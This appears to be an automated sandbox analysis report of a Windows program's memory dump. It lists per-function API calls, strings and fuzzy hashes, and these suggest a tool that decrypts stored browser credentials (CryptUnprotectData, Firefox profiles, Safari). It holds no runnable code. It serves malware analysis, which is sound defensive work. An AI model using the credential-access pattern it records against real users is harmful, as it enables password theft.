                                                                                                                  • Opcode Fuzzy Hash: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                                                                  • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                                                  APIs
                                                                                                                  • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: NtdllProc_Window
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4255912815-0
                                                                                                                  • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                  • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                                                  • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                  • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                                                  APIs
                                                                                                                  • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                  • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                  • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                  • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                    • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                  • memset.MSVCRT ref: 0040265F
                                                                                                                  • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                    • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                    • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                  • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                  • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                                                                                  • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                  • API String ID: 2929817778-1134094380
                                                                                                                  • Opcode ID: 6a9a7dcbd14ffa51df405e1a5867c443e070cad0e5c800a91192ec5c53283d41
                                                                                                                  • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                  • Opcode Fuzzy Hash: 6a9a7dcbd14ffa51df405e1a5867c443e070cad0e5c800a91192ec5c53283d41
                                                                                                                  • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                  • String ID: :stringdata$ftp://$http://$https://
                                                                                                                  • API String ID: 2787044678-1921111777
                                                                                                                  • Opcode ID: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                                                  • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                  • Opcode Fuzzy Hash: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                                                  • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                  • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                  • GetDC.USER32 ref: 004140E3
                                                                                                                  • wcslen.MSVCRT ref: 00414123
                                                                                                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                  • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                  • _snwprintf.MSVCRT ref: 00414244
                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                  • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                  • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                  • String ID: %s:$EDIT$STATIC
                                                                                                                  • API String ID: 2080319088-3046471546
                                                                                                                  • Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                                                  • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                  • Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                                                  • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                  APIs
                                                                                                                  • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                  • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                  • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                  • memset.MSVCRT ref: 00413292
                                                                                                                  • memset.MSVCRT ref: 004132B4
                                                                                                                  • memset.MSVCRT ref: 004132CD
                                                                                                                  • memset.MSVCRT ref: 004132E1
                                                                                                                  • memset.MSVCRT ref: 004132FB
                                                                                                                  • memset.MSVCRT ref: 00413310
                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                  • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                  • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                  • memset.MSVCRT ref: 004133C0
                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                  • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                  • wcscpy.MSVCRT ref: 0041341F
                                                                                                                  • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                  • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                  Strings
                                                                                                                  • {Unknown}, xrefs: 004132A6
                                                                                                                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                  • API String ID: 4111938811-1819279800
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                  • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                  • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                  • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                  • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                  • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                  • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                  • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                  • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                  • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                  • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 829165378-0
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00404172
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                  • wcscpy.MSVCRT ref: 004041D6
                                                                                                                  • wcscpy.MSVCRT ref: 004041E7
                                                                                                                  • memset.MSVCRT ref: 00404200
                                                                                                                  • memset.MSVCRT ref: 00404215
                                                                                                                  • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                  • wcscpy.MSVCRT ref: 00404242
                                                                                                                  • memset.MSVCRT ref: 0040426E
                                                                                                                  • memset.MSVCRT ref: 004042CD
                                                                                                                  • memset.MSVCRT ref: 004042E2
                                                                                                                  • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                  • wcscpy.MSVCRT ref: 00404311
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                  • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                  • API String ID: 2454223109-1580313836
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                  • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                  • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                  • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                  • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                  • memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                  • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                  • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                  • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                  • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                  • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                  • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                    • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                    • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                  • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                  • API String ID: 4054529287-3175352466
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                  • API String ID: 3143752011-1996832678
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                  • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                  • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                  • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                  • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                  • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                  • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                  • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                  • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                  • API String ID: 667068680-2887671607
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                  • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                  • API String ID: 1607361635-601624466
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _snwprintf$memset$wcscpy
                                                                                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                  • API String ID: 2000436516-3842416460
                                                                                                                  • Opcode ID: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                                                                  • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                  • Opcode Fuzzy Hash: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                                                                  • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                    • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                    • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                    • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                    • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                    • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                    • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                    • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                    • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                    • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                    • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                  • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                  • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                  • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                  • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                  • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                  • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                  • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                  • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                  • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1043902810-0
                                                                                                                  • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                  • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                  • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                  • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                  APIs
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                  • _snwprintf.MSVCRT ref: 0044488A
                                                                                                                  • wcscpy.MSVCRT ref: 004448B4
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                  • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                  • API String ID: 2899246560-1542517562
                                                                                                                  • Opcode ID: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                                                                  • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                  • Opcode Fuzzy Hash: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                                                                  • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040DBCD
                                                                                                                  • memset.MSVCRT ref: 0040DBE9
                                                                                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                    • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                    • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                    • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                  • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                  • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                  • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                  • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                                                                                                  • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                                                                                                  • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                  • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                  • API String ID: 3330709923-517860148
                                                                                                                  • Opcode ID: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                                                  • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                                  • Opcode Fuzzy Hash: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                                                  • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                                  APIs
